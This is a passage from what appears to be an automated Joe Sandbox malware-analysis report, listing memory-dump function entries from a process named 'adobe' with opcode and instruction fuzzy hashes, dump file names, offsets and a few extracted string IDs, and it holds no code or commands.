                                                        • Instruction ID: 86f643da698111aa4368f14676c56e76f5161afa0b604489d61081de6e1398aa
                                                        • Opcode Fuzzy Hash: d5307c803ebf18555a0fcb2119090d01431c3d709e81550ffb7af96b4cf18037
                                                        • Instruction Fuzzy Hash: 0741C4B0E006099FDB65DF75D44069EBBB2FF89380F104969E425EB354EB71A842CB90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PHeq
                                                        • API String ID: 0-2873676430
                                                        • Opcode ID: 9c5f7d947d07070a3837d9b4deaf340f836366c91ccc2e26eaeaa12ce063283e
                                                        • Instruction ID: 342b05236dec91848ee6308a974c053608b2e7e213d6ab94097eedabefe725c9
                                                        • Opcode Fuzzy Hash: 9c5f7d947d07070a3837d9b4deaf340f836366c91ccc2e26eaeaa12ce063283e
                                                        • Instruction Fuzzy Hash: EC31D070B102058FDF59AB75D51466F7BA3EB89200F2045B8D416DB3A8EF36DD86CB90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \Ojq
                                                        • API String ID: 0-1665755004
                                                        • Opcode ID: f0475f32200928853c05a02da57a92748e6c01b2354fc89785ab16ecc915a33d
                                                        • Instruction ID: ad5b2c606dfd6b2f8c639c3ec4618f27764632597891def821d282a3178c6cd0
                                                        • Opcode Fuzzy Hash: f0475f32200928853c05a02da57a92748e6c01b2354fc89785ab16ecc915a33d
                                                        • Instruction Fuzzy Hash: 98F0FE70E24129DFDB24DF94E959BAE7BB2FF88B05F200129E012A7294CB751C41CB80
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2fcd2c3780dde6615deacd5898d76a3ef52287aeb0dd3515c05de2ae1d1eb865
                                                        • Instruction ID: 5178da9d05e43767b510a9137f7d36e11ffe623d489988ec0e8c9e08cc317bfa
                                                        • Opcode Fuzzy Hash: 2fcd2c3780dde6615deacd5898d76a3ef52287aeb0dd3515c05de2ae1d1eb865
                                                        • Instruction Fuzzy Hash: FF925574E002048FDBA4DB68C584A5DBBF2FF49314F5484A9E42AEB361DB35ED85CB90
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: be1f0a4507c23d56b2ce5e065929893c5d27d3c78e383c5c4d15c43a99399cd4
                                                        • Instruction ID: f0a8099d5534667810a04778bc218243d8f03748a6862fca7d3b4f8cc5cf6452
                                                        • Opcode Fuzzy Hash: be1f0a4507c23d56b2ce5e065929893c5d27d3c78e383c5c4d15c43a99399cd4
                                                        • Instruction Fuzzy Hash: E961B3B1F005124BCF549A7EC89066FAAD7EFD4210B254579D80EEB364EE69EC0287D1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d17b661c7064c7f5f0c4830334a1d104e7ecef704af2a6a4dfb14505f8b01796
                                                        • Instruction ID: 9e5113bf4477bd3a810a3ec059e944c16e423aad3f0d7f83ace0f31137af6a18
                                                        • Opcode Fuzzy Hash: d17b661c7064c7f5f0c4830334a1d104e7ecef704af2a6a4dfb14505f8b01796
                                                        • Instruction Fuzzy Hash: 24817B70B006098FDF54DFA8D5506AEB7F2EB89300F108569D51AEB398EB35DC828B91
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dd84f7dfc5bc3eafcb097564bee5ed9728dd0243b77733d45d13b2b760d39b91
                                                        • Instruction ID: 8842af032cd1b6eee7a92fb1e5b52c7107c310a1d797f802d706bbc7b94b6f5a
                                                        • Opcode Fuzzy Hash: dd84f7dfc5bc3eafcb097564bee5ed9728dd0243b77733d45d13b2b760d39b91
                                                        • Instruction Fuzzy Hash: 5A915E70E102198FDF60DF68C880B9DB7B1FF89300F208695D559BB295DB70AA85CF91
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d5bfb5b06db9f16652bd8f7d7476adf0f586186179541a73e14dafddc04003d4
                                                        • Instruction ID: 1c07d3b510811db782946c18cda11b220908c1c701021eed1620728e63065416
                                                        • Opcode Fuzzy Hash: d5bfb5b06db9f16652bd8f7d7476adf0f586186179541a73e14dafddc04003d4
                                                        • Instruction Fuzzy Hash: 0D914070E102198BDF64DF68C880B9DB7B1FF89304F208595D559BB395EB70AA85CF90
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b094de305575a66c092467e199dd3a46bebe7a73c3a3e132e2ebf480da1b01df
                                                        • Instruction ID: 1eefdbcd0cdcdc360081175ed5b34079496182a2cff60c3bfd6131af07fa22e9
                                                        • Opcode Fuzzy Hash: b094de305575a66c092467e199dd3a46bebe7a73c3a3e132e2ebf480da1b01df
                                                        • Instruction Fuzzy Hash: 2D715CB0A002198FDB54DFA9D990AADBBF6FF88304F248569E015AB754DB30ED46CB50
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 781a3902c75a6c265a779e309c0c95866654c576fbe936afd5530d71cd5a5ecb
                                                        • Instruction ID: cbb42676b12ecbf52d874a5688ff77f54b59c05e1e7dcccd8022ba1351ff0145
                                                        • Opcode Fuzzy Hash: 781a3902c75a6c265a779e309c0c95866654c576fbe936afd5530d71cd5a5ecb
                                                        • Instruction Fuzzy Hash: 5B713CB0A002198FDB54DFA9D990AADBBF6FF88304F248569E015EB754DB30ED46CB50
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 17f4abd4c477031d80e4b07106565c620d3fedf986140267fac7b7e60eecc917
                                                        • Instruction ID: 0e9384c0169e8eee1f65465a89a9150fce71f251d91aed5559506a4b96931f78
                                                        • Opcode Fuzzy Hash: 17f4abd4c477031d80e4b07106565c620d3fedf986140267fac7b7e60eecc917
                                                        • Instruction Fuzzy Hash: C151E3B1E001099FDF54EBB8E4442BDBBB6FF84315F2048B9E126DB254DB319845CB94
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0ace73d8c0fef983e94678e17ceac7d824911d7bd66baae4827bb95f13e9f1ab
                                                        • Instruction ID: 59bebed57d7b9fe6a01e0e3ccd2dd3ebf491dd4aa6fded2762ba73bd07fe15e9
                                                        • Opcode Fuzzy Hash: 0ace73d8c0fef983e94678e17ceac7d824911d7bd66baae4827bb95f13e9f1ab
                                                        • Instruction Fuzzy Hash: 665129B0B201189BEFA4567DD85073F366EDBC9310F204526E11AC73D9CB78DC8187A2
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e38b1c594bc77e9c52ff284634983ac237bf58586d374fab1c91fd170089127f
                                                        • Instruction ID: b96ed6d7c753ee1d3c60d9c5f648734ae6939d55ddd75e5468fd72a9eb6c7e5c
                                                        • Opcode Fuzzy Hash: e38b1c594bc77e9c52ff284634983ac237bf58586d374fab1c91fd170089127f
                                                        • Instruction Fuzzy Hash: 905107B0B201189BEFA466BDD85473F366FD7C9310F20452AE51AC7399CB78DC8147A6
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 05a01a0987dd0eb8cf84ab02ef79807b59b2a2384085a6d65584afa0e2b3b260
                                                        • Instruction ID: d48c0d979ebe6d8d6040169566e3622e5748cc52c8020021e9a58181d3abc49a
                                                        • Opcode Fuzzy Hash: 05a01a0987dd0eb8cf84ab02ef79807b59b2a2384085a6d65584afa0e2b3b260
                                                        • Instruction Fuzzy Hash: 685185B6E002098FDF718A69C4C077EBBB2FB45310F2499A9E165DB285CE35E941CB91
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4285d02199fb3c762bcd48ccbf0fb04a414929204851de44b46bd47d1321941b
                                                        • Instruction ID: 9861d3b19dad52d94e23985192de9b7f319bbf187c11fa0b4c5e55ae1a7507e6
                                                        • Opcode Fuzzy Hash: 4285d02199fb3c762bcd48ccbf0fb04a414929204851de44b46bd47d1321941b
                                                        • Instruction Fuzzy Hash: 144162B2E006059FDB70CFA9D880AAFFBB2FB45310F10496AE266D7650D730E9558B91
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b53cb8c2d83b0a198076fe7fa9a9863b52c7c0fd004cf2808631e4af23a03e20
                                                        • Instruction ID: 53adf9bee593e93a8f64f68a5286896a7a0af9a622e1f94a6b0a30ec03a69a5b
                                                        • Opcode Fuzzy Hash: b53cb8c2d83b0a198076fe7fa9a9863b52c7c0fd004cf2808631e4af23a03e20
                                                        • Instruction Fuzzy Hash: E531C470E1461A8BDF64DF69D58069EB7B2FF84300F108A69E416EB644EB70A942CB90
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ead2ac745c003607df670b6a947c768ef65dd6072f4ee057a55d8dcb5ebed7cf
                                                        • Instruction ID: 84db70869174185f21ee4877d819029c6bf8388d1cb00170f9f6f9255e666b40
                                                        • Opcode Fuzzy Hash: ead2ac745c003607df670b6a947c768ef65dd6072f4ee057a55d8dcb5ebed7cf
                                                        • Instruction Fuzzy Hash: 0C31B070E0021A9FDB59CFA9C95469EB7F2FF89300F108569E916EB750DB31AD42CB90
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0e7db5d4b2f7dbd9baaa7b5ab047a85889f5d0c041692c1a62d1e6b0a4ab1bfa
                                                        • Instruction ID: f71ae03d99d9676cbf2bc71810fdee05a5435ee2a7c8043d407db633b8dc5336
                                                        • Opcode Fuzzy Hash: 0e7db5d4b2f7dbd9baaa7b5ab047a85889f5d0c041692c1a62d1e6b0a4ab1bfa
                                                        • Instruction Fuzzy Hash: 7031AE70E0061A9FDB58CFA9C95469EB7F2FF89300F108529E916EB750DB31AD42CB90
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 48132955acc7ee8bcfa3dcd3d9d069345632865f90afff2e58a29c3b8a722e17
                                                        • Instruction ID: 553cdee425e43697cbc35353254e5821d5e8ba12f95509a5e64a385bd1e5d682
                                                        • Opcode Fuzzy Hash: 48132955acc7ee8bcfa3dcd3d9d069345632865f90afff2e58a29c3b8a722e17
                                                        • Instruction Fuzzy Hash: 71217AB5F002199FDB40DF69D990AAEB7F1FB48350F108066E915EB394E735D9008B90
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b8f692236357dcf00551e83d3943fe960cded10e271a000a9d38dadcff311efc
                                                        • Instruction ID: 31ac93d824b4624e89e4133344c9870ba181fd5c42b2b63a4bbbcd1a71661e6a
                                                        • Opcode Fuzzy Hash: b8f692236357dcf00551e83d3943fe960cded10e271a000a9d38dadcff311efc
                                                        • Instruction Fuzzy Hash: A0218EB2F0021A9FDF40DF69D950AAEB7F1FB88350F10816AE915EB394E735D9108B90
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1783245105.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_115d000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 18a7d0df876e6cc029c92872f2ee96beca96ea5cd9f5bfbb89dbd448a9ea6a25
                                                        • Instruction ID: 8cb759ef1de6782f157143a88180e951c20ae3561185bf66161d242d6de09523
                                                        • Opcode Fuzzy Hash: 18a7d0df876e6cc029c92872f2ee96beca96ea5cd9f5bfbb89dbd448a9ea6a25
                                                        • Instruction Fuzzy Hash: 3F2100B1604200DFDF59DF98E980B26BBA5EB88314F24C56DED0A4B242C33AD447CB62
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1783245105.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_115d000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 86cbc987cf9a18dbd653e772f3de78900abd603dd72437a53bbfecdb5f9a0833
                                                        • Instruction ID: 090565055f21db6a2d3d1a67923161cb3952a877bd108445527cc0c0cdcbfda9
                                                        • Opcode Fuzzy Hash: 86cbc987cf9a18dbd653e772f3de78900abd603dd72437a53bbfecdb5f9a0833
                                                        • Instruction Fuzzy Hash: 52216B715093C0DFDB07CB64D990B11BF71EB46214F29C5DBD8898B2A7C33A984ACB62
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 36d974a8f6f898a54c3561626b21a737f85d103c881325b753f1cfebab88dcda
                                                        • Instruction ID: 4585892480084887640f80446c2f9080beed40b99cbe8afabd2a77ebb51709bb
                                                        • Opcode Fuzzy Hash: 36d974a8f6f898a54c3561626b21a737f85d103c881325b753f1cfebab88dcda
                                                        • Instruction Fuzzy Hash: F6012470B245210BCB6596BD9810BABB7DFEBC9721F10846AF11EC7381EE21DC1247E6
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b5a27431474471e9b31ffcd55d76ec1a1de4e0277a4bbeffd77796a78945e839
                                                        • Instruction ID: a5ac946c8ba76ea27c74cf8e4a91db04447d8bdbcf103aded01c81a1e5c47782
                                                        • Opcode Fuzzy Hash: b5a27431474471e9b31ffcd55d76ec1a1de4e0277a4bbeffd77796a78945e839
                                                        • Instruction Fuzzy Hash: D211AD32B101298FCF54A768D8246AE73EBEBC8211F004179C516E7358EE76DC028BE2
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b2dd74a3f5a93b2f34520fa39a75ff8474877b36997284fdd6b709e352e4a131
                                                        • Instruction ID: e75448d5ae14b058455027ae18de1f4685d88677818ff8e7894ef234dd997810
                                                        • Opcode Fuzzy Hash: b2dd74a3f5a93b2f34520fa39a75ff8474877b36997284fdd6b709e352e4a131
                                                        • Instruction Fuzzy Hash: 9201F174B046105FCBA1AA7C9814BAFB7DAEB85710F104569F11AC7351DA21DC0287E1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7448e6c0d28a37b10ca484738a8e7c9362b832a7cf6b75b9c58017bd85503836
                                                        • Instruction ID: b9e1239d7cf3367d58351a2d8ccbd7aedde201397f9ababe5de789233e62e428
                                                        • Opcode Fuzzy Hash: 7448e6c0d28a37b10ca484738a8e7c9362b832a7cf6b75b9c58017bd85503836
                                                        • Instruction Fuzzy Hash: 2C21F2B1D01659EFCB10CF9AD884ACEFBF8FB48320F10816AE918A7200C374A544CBA5
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4335f4a28b0e178965b008f35ba1bc918849e4b08ecf059106f65a6dc795d95e
                                                        • Instruction ID: e8cdb054a9287936d16b58408aef89d49f5eab9d5e6abf637c136f0d5a8a60c2
                                                        • Opcode Fuzzy Hash: 4335f4a28b0e178965b008f35ba1bc918849e4b08ecf059106f65a6dc795d95e
                                                        • Instruction Fuzzy Hash: 0701DF72B109294BDF55A66CDC146EF73EBEBC8612F004175D12AE7298EE658C024BE1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d13ee899378b29b5f0c5063bc8a874cb7026a24d1d958aebfd07b965092f165b
                                                        • Instruction ID: cd08406c90234f315c4a4cbe53f4b97a2ed3108e704f61138f4264b654daef8f
                                                        • Opcode Fuzzy Hash: d13ee899378b29b5f0c5063bc8a874cb7026a24d1d958aebfd07b965092f165b
                                                        • Instruction Fuzzy Hash: B2012475B180910BCBA986BC941473E67CACBC9220F1484AEF11ACB350D920CC028799
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 89eb63e415fff00f3b294ae1c81ed7995bed57b668b8fdedec636df9d16aff86
                                                        • Instruction ID: ce7f405aef7908058bf65922da00b6543d0edbf44deb24277b87fe72c6541798
                                                        • Opcode Fuzzy Hash: 89eb63e415fff00f3b294ae1c81ed7995bed57b668b8fdedec636df9d16aff86
                                                        • Instruction Fuzzy Hash: 3B11D3B1D01259DFCB00CF9AD884ACEFBF8FB48320F10812AE918A7240C3746544CFA5
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c953e4ce3d93557d68c4eec1596eb4d0db39b6ef6688f72fafc9b264b0245c1e
                                                        • Instruction ID: a7cb67be90680e4f5a566e3db566aa0b967d5fe0664b7ae7e9d1ab426e71a4fe
                                                        • Opcode Fuzzy Hash: c953e4ce3d93557d68c4eec1596eb4d0db39b6ef6688f72fafc9b264b0245c1e
                                                        • Instruction Fuzzy Hash: 0B01F470B244120BDB6496BED410B6FB2CBEBC8721F10987AE61FC7784EE61DC024395
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d5c93dee89c9ec476866944597b58ea826f386dd18565b58a91fde99af3eaa5
                                                        • Instruction ID: 2e90bc29184f72271a9172b2db24e8678763a5e39138913de0a785fdf688fb38
                                                        • Opcode Fuzzy Hash: 2d5c93dee89c9ec476866944597b58ea826f386dd18565b58a91fde99af3eaa5
                                                        • Instruction Fuzzy Hash: E4018175B145111BDB6496BD945073EA3DBDBC9620F108469F11AC7354DE21DC024799
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b08d74e380183e6454d44eecfd201f99742a9a0c1e704a9cc94c9948b94e41dd
                                                        • Instruction ID: c5bcfb5a041adf20e6a1739babdf6a3bc88ddea17f6425859b3fc055465b7021
                                                        • Opcode Fuzzy Hash: b08d74e380183e6454d44eecfd201f99742a9a0c1e704a9cc94c9948b94e41dd
                                                        • Instruction Fuzzy Hash: 0E01F474B101158FCBA0EA7DD454B2EB3DAFB89714F108468E11BC7354EA21DC028790
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 55d76a81762a97a31cbdb09358cceb7924fc4d3f65a69a7e50fced4cc85acb1f
                                                        • Instruction ID: 583ff8a0bcaa6cd9fc5b7a283b38986857f11309a505065ac1f22a950a71bfc9
                                                        • Opcode Fuzzy Hash: 55d76a81762a97a31cbdb09358cceb7924fc4d3f65a69a7e50fced4cc85acb1f
                                                        • Instruction Fuzzy Hash: 34E092B1E18648AFDF60DAB0995564A7B6DDB02204F1044F5E414D7142E275CE019792
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-2049195972
                                                        • Opcode ID: a837945ac32626fcdce9892fd2cdc6e87df1cac3bb03d4468a603c9776028e49
                                                        • Instruction ID: 36c90a48f5071e0d22d7477e92bfae4ce7658ce310d1bbb7d96005216a219fbe
                                                        • Opcode Fuzzy Hash: a837945ac32626fcdce9892fd2cdc6e87df1cac3bb03d4468a603c9776028e49
                                                        • Instruction Fuzzy Hash: 65121B70A01219CFDB64DF79C954A9EB7B2FF89304F2085A9D41AAB264EF319D45CF80
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-1110479544
                                                        • Opcode ID: 890ccac2503672819cd3f3f5bd2366d34d1056c1ce826d00be418a7315d17f4d
                                                        • Instruction ID: 86bfdade4c88a776c3dba16b00d67fb7ee3591b78134e433b6a47b2805a6c3aa
                                                        • Opcode Fuzzy Hash: 890ccac2503672819cd3f3f5bd2366d34d1056c1ce826d00be418a7315d17f4d
                                                        • Instruction Fuzzy Hash: D49184B0A0020ADFDBA8DF79D954B6E7BB2FF44305F108569E412AB394DB759C41CB90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .5}q$$eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-1622854337
                                                        • Opcode ID: fff2c74a920d9f24a263f114acb78397db3c3209141d0a19b5328f276456ede8
                                                        • Instruction ID: 65e8491a2cf830b3cff7ad6117f9ca9452034c49f448030d9292a920ca9b60df
                                                        • Opcode Fuzzy Hash: fff2c74a920d9f24a263f114acb78397db3c3209141d0a19b5328f276456ede8
                                                        • Instruction Fuzzy Hash: 5DF11974A00209CFDB59EF79D554A6EBBB2FF84304F2485A8D8159B398DB35EC42CB90
                                                        Strings
                                                        Memory Dump Source
